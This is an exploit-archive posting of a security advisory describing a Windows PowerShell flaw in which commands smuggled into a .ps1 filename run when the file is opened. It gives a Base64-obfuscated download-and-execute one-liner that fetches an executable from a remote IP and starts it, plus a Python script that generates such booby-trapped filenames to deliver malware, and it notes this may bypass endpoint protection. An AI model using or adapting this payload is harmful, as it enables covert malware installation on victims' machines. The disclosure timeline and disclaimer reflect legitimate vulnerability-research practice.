exploit the possibilities

Microsoft Windows PowerShell Command Execution

Microsoft Windows PowerShell Command Execution
Posted Aug 2, 2019
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Microsoft Windows suffers from a PowerShell unsanitized filename command execution vulnerability.

tags | exploit
systems | windows
MD5 | 4059533a64c2c0436da56ba2b23fecdc

Microsoft Windows PowerShell Command Execution

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators.
PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
Double click to open in PowerShell watch the file get downloaded saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
return parser.parse_args()

def main(args):
PSEmbedFilenameMalwr=""
if args.ipaddress:
PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
f.write("Write-Output 'Have a nice day!'")
f.close()

if __name__=="__main__":

parser = argparse.ArgumentParser()
PSCmds = main(parse_args())

if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)

create_file(PSCmds)
print "PowerShell - Unsantized Filename Command Execution File created!"
print "By hyp3rlinx"




[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 20, 2019
MSRC "does not meet the bar for security servicing" : July 23, 2019
August 1, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close